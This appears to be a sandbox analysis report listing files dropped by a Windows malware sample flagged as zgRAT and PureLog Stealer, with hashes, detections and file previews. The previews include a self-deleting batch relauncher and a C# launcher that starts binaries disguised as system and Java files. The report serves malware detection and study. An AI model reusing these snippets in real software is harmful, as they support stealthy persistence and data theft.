                                                    Encrypted:false
                                                    SSDEEP:6:uWdIRbart05x9rjhPeQLd482X5jGvC0+lij66hddfklIjSQ:rK5CytjxJI6a0+l066hdWC
                                                    MD5:95A825812FCA20220C502331B5BCB0B9
                                                    SHA1:CC558E599AB014B2436C84E3DF7DD35FFDEA39C2
                                                    SHA-256:0E2C1866BF7CD157550C9D4FA94AC29FA1E70DF04BB361279E51CE32A6E587B7
                                                    SHA-512:D2EE913B86BC1EC0CAB03F493EA6F0F1E7298A4F0F349A47506B3477084A7A034E5F3F069037D744C9F9236358143B9837AD780A7364EEDFFFD04FF348D46A8C
                                                    Malicious:false
                                                    Preview:Sq3IJkPxRZamv7yZpWo5EMXZGG6z140YsXclTm4wN81bGb1Jgn6ErgMFSeCCnZ5XjC4XeNFDb1rFV5SpPxTO7vqMLWSzj1IxDd2EgeoSh3m0yGuXLXx0GqayVsMI5Qdkt4C1DOIvIBrEI0XFl5oMDSrWDEtySgXQZCH3D2T7PCrE9VpeUGgAmRgaMpy9eTdlnapGteBtlq6BkmXrYOeLAXoHgqqYEUc5jFbiqjvzFwY5Uf0kSHkPyRlQwhkDxnoQOAbeLzAydoFN8sxA0GF7u
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\llflCdrMcgGB.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1396
                                                    Entropy (8bit):5.350961817021757
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                    Process:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):0.08235737944063153
                                                    Encrypted:false
                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):51200
                                                    Entropy (8bit):0.8746135976761988
                                                    Encrypted:false
                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.243856189774723
                                                    Encrypted:false
                                                    SSDEEP:3:2zDWor5pbn:2z1zbn
                                                    MD5:5204A3BD7B852D5DF58EC915CB513C8F
                                                    SHA1:20B9478191B6864D73205237CD923A1B17C561EB
                                                    SHA-256:1C17E2095471A1AE2C56653F703726851D1E375CEFFF6F9F732A51FD32C25107
                                                    SHA-512:BF4DC7609E23658C664E21D78E406F6F6F790AB9CF6D15813DAA20729AE78B7B2ADBCC5B813A150ED2CCA9F174F13E53BE592683F9628DA4F7C6638EC16012C5
                                                    Malicious:false
                                                    Preview:SPqSVh36MapbZ6QXNe9ZnP1ql
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1368932887859682
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                    MD5:9A534FD57BED1D3E9815232E05CCF696
                                                    SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                    SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                    SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.8517407251719497
                                                    Encrypted:false
                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
                                                    MD5:D0962B221779A756754334848DCFF184
                                                    SHA1:22CD3B9D687216E6921553F55958449CE7ABF05D
                                                    SHA-256:7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
                                                    SHA-512:05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.163856189774724
                                                    Encrypted:false
                                                    SSDEEP:3:kTynh:S4
                                                    MD5:BB9A3F21D31AFF2EFB86C5B343D35C9C
                                                    SHA1:EB6FFDA68A0282546D0B3E3EDB9DF2D2BF15945A
                                                    SHA-256:B54C8ECC5F77920FAC3666322D4DE2C381F584BF898984B7983ACF7B70EF6DE3
                                                    SHA-512:D5F75CCBD77610B0B0E5DE3C28930AF19568AF8715CB75766F92D896D5AD05E721A7BFCDF49F989842B2944D205EB374A2C5B2F39C47D6AEA9DCD11547C51E3D
                                                    Malicious:false
                                                    Preview:Dg4SZ3vJJsgLBU9uhvN9qaSh8
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Wed Jul 3 15:44:08 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1924
                                                    Entropy (8bit):4.616468313413664
                                                    Encrypted:false
                                                    SSDEEP:48:FyLzHxJTMKTNmslmuulB+hnqXSfbNtmhn:MnHxJIKTws2TkZzNtyn
                                                    MD5:8C7636409261831400DB4078DBAEAB8A
                                                    SHA1:E4E4C58E19C93286F58C36FB2E68CCDC8D90A299
                                                    SHA-256:6ED3B8B8D7CF04FEE59438F7FBA84F382635A8598C5740EC9741BD85861353F8
                                                    SHA-512:7AFF9BA5B3F683CF33EAAEDE98110E246FE477E851524BBEC4ECB71AA3AF9C8C18C9044B0F1580EFE6D7297594D46D485FC9054CBE28B3356E436FF0DE32AF5D
                                                    Malicious:false
                                                    Preview:L....q.f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP....................q.QK.......N..........3.......C:\Users\user\AppData\Local\Temp\RESD41E.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Wed Jul 3 15:44:09 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1948
                                                    Entropy (8bit):4.560953863711213
                                                    Encrypted:false
                                                    SSDEEP:24:HSG9EnOOM7tUTHfwKTF7mNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:sotUTIKTNmEluOulajfqXSfbNtmhY2Z
                                                    MD5:324CA34E251CEC60B063388454EFEC3C
                                                    SHA1:16793ECC8FA72014BBCAFDD7B7DB98A6BD67330A
                                                    SHA-256:D12313FCE202E5F5F9CD8BA278C5D0AAE3C1B4C98029C8E4E3A38FD1F96CDDCA
                                                    SHA-512:08B89A3A9116F91EEE33027A5B1C4663163C77833BEC5D9D864D5664B3F778E2316EB808955BBE56E8596409F5BE1569B709FDACD98CDAC54414306E15BE8BD5
                                                    Malicious:false
                                                    Preview:L....q.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........;....c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP...................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RESD631.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1368932887859682
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                    MD5:9A534FD57BED1D3E9815232E05CCF696
                                                    SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                    SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                    SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.483856189774723
                                                    Encrypted:false
                                                    SSDEEP:3:rUOgSBAQ:IOXBAQ
                                                    MD5:AEBF90D979165F93607E84D66D943BE2
                                                    SHA1:279594DF27EEA6D9DE50A9F2618C50409DF106E9
                                                    SHA-256:C010A3BF6D6310E41FFC8DC7745755BDA76475C95E6E4D9943E6F4B3F0E9A5A5
                                                    SHA-512:5E97E349D16D96B9E9CBBFF83B89FBC7964421A6404A21F47870BB4B1844EA74FCCD373288E70A4AAB3E203A4FAA628B698D179E3D2994D17465C771912C2630
                                                    Malicious:false
                                                    Preview:zfZT1BFUgwCzX7xjvsbAHByNa
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):5.241547274750078
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1SV+DE1kAOXF7IthxhGvKOZG1Fi23fpxDHn:HTg9uYDE4VctUSZBJHn
                                                    MD5:6292538CD0390751F01DBB25BBBE6FB8
                                                    SHA1:2A2458FFD385A519B1F16B145BBAD056375B7867
                                                    SHA-256:AB2CA8EEBA376303306E6371264CBCCAB03D113A318B5B3B3D5330097148997B
                                                    SHA-512:E89B72CE8022F6244D68523B72697ADE3A6E56F064E8F12743108D8170B5ABB091AE71D57AB04311C20F5710F82D39C8C5B4EB9D136E632203279539C1E8D18C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\WAeZ9wWpbS.bat"
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):391
                                                    Entropy (8bit):4.976194589667253
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LuriFkD:JNVQIbSfhV7TiFkMSfhWLumFkD
                                                    MD5:9CDCDA8140C021A4111C513222BFB45C
                                                    SHA1:65DF9B55815F7CFCAE35F6A20F078D83B5F627ED
                                                    SHA-256:A3C3FE34EB6303790DA3A42F79FF7388459261A8A5AE4424E70E601AAB1A6E8D
                                                    SHA-512:AE9C2912EDF134C4CEB2EEE246EB6416951B0B2FC2834D6F39F55C356305EC33AFDE25A73BB6E6082A5EAD2DFEF640A1C564380DFD29303AE760681A142CE9F3
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\jre-1.8\upfc.exe"); } catch { } }).Start();. }.}.
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):249
                                                    Entropy (8bit):5.084607394536653
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oFi23fXZT+fA:Hu7L//TRq79cQjZhS4
                                                    MD5:6022CBCE8F940E0230CC9CB93716B1A9
                                                    SHA1:B416FD36CF8C905C68E68FBCE072C27D0ABECB1B
                                                    SHA-256:705275B16EF325992CF229228B5DDDE47C9EEB035A3837375E22094D46159B49
                                                    SHA-512:63ECE0323E26DA705BEE22E9109AF5AA6B5F4964B1CE7D6723BBB085C4E4E10131566D677807F4817122AC4B553649642FF4F97673342780329AF967DCBBBDE1
                                                    Malicious:false
